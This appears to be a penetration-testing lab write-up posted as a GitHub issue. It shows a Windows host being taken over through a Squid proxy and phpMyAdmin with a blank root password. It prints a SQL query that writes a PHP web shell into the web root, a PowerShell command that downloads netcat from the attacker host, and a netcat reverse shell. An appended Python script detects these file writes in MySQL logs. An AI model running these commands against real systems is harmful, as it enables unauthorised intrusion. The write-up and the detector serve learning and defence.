Open WDavid404 opened 4 months ago
nmap scan:

```
PORT     STATE SERVICE       REASON          VERSION
135/tcp  open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack ttl 125
3128/tcp open  http-proxy    syn-ack ttl 125 Squid http proxy 4.14
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/4.14
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
```
searchsploit squid 4.14 --> no info
According to hacktricks, use the spoke.py tool --> ports 3306 and 8080 may be open inside.
Access port 8080 via the Firefox browser through the proxy.
Apache 2.4.46, MySQL 5.7, MariaDB 10.4, phpSysInfo 3.3.2 --> no useful exploit info
Log in to the /phpadmin page with root/<blank>
--> succeeded
On the "SQL" tab page, we can execute a SQL command:

```sql
SELECT "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE "C:/wamp/www/webshell.php"
```

(According to "Apache environment" in the "phpinfo" page, we know the root dir is "C:/wamp/www/")

Then, http://192.168.199.189:8080/webshell.php?cmd=whoami --> works.

http://192.168.199.189:8080/webshell.php?cmd=powershell+ls+C:/users --> there is a "Public" user

http://192.168.199.189:8080/webshell.php?cmd=powershell+iwr+-uri+http://192.168.45.192/nc64.exe+-Outfile+c:/users/public/Downloads/nc64.exe

http://192.168.199.189:8080/webshell.php?cmd=c:/users/public/Downloads/nc64.exe+-e+cmd.exe+192.168.45.192+443 --> we got a reverse shell from the target host on the Kali machine
key points:

```sql
SELECT "<command>" into OUTFILE "<file>"
```
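A detection-side illustration, added here and not part of the original post: scanning MySQL/MariaDB general-log lines for `INTO OUTFILE` / `INTO DUMPFILE` writes and rating any target that lands in a web root such as the `C:/wamp/www/` path noted above. The log lines, the web-root list and the extension list are constructed assumptions, not real logs.

```python
"""Flag MySQL/MariaDB general-log entries that write query results to disk."""
import re
from dataclasses import dataclass

# Assumed web roots to watch (constructed list); C:/wamp/www/ is the one from the write-up.
WEB_ROOTS = ("c:/wamp/www/", "c:/xampp/htdocs/", "/var/www/")
# Extensions the web server would execute rather than serve as plain data.
WEB_EXTS = (".php", ".phtml", ".jsp", ".aspx", ".asp")

# Matches INTO OUTFILE / INTO DUMPFILE and captures the quoted target path.
OUTFILE_RE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\s+(['\"])(.+?)\2", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    kind: str      # OUTFILE or DUMPFILE
    path: str      # file the query tried to write
    severity: str  # high / medium / low


def classify_path(path: str) -> str:
    """'high' if the target is an executable script inside a web root, 'medium' if only one holds."""
    p = path.replace("\\", "/").lower()
    in_root = any(p.startswith(root) for root in WEB_ROOTS)
    web_ext = p.endswith(WEB_EXTS)
    if in_root and web_ext:
        return "high"
    if in_root or web_ext:
        return "medium"
    return "low"


def scan_general_log(lines):
    """Return one Finding per log line that contains a file-write clause."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = OUTFILE_RE.search(line)
        if m:
            findings.append(Finding(n, m.group(1).upper(), m.group(3), classify_path(m.group(3))))
    return findings


# Constructed sample general-log lines; the second mirrors the query quoted in the write-up.
SAMPLE_LOG = [
    "2024-05-01T10:14:58.000000Z\t   12 Query\tSELECT id FROM users LIMIT 5",
    "2024-05-01T10:15:02.000000Z\t   12 Query\tSELECT \"<?php echo shell_exec($_GET['cmd']);?>\" into OUTFILE \"C:/wamp/www/webshell.php\"",
    "2024-05-01T10:16:10.000000Z\t   14 Query\tSELECT * FROM orders INTO OUTFILE '/tmp/orders.csv'",
]

if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.kind} -> {f.path} [{f.severity}]")
```

The general log must be enabled for this to see anything; on the hardening side, MySQL's `secure_file_priv` set to `NULL` disables these writes entirely and a dedicated non-web directory confines them.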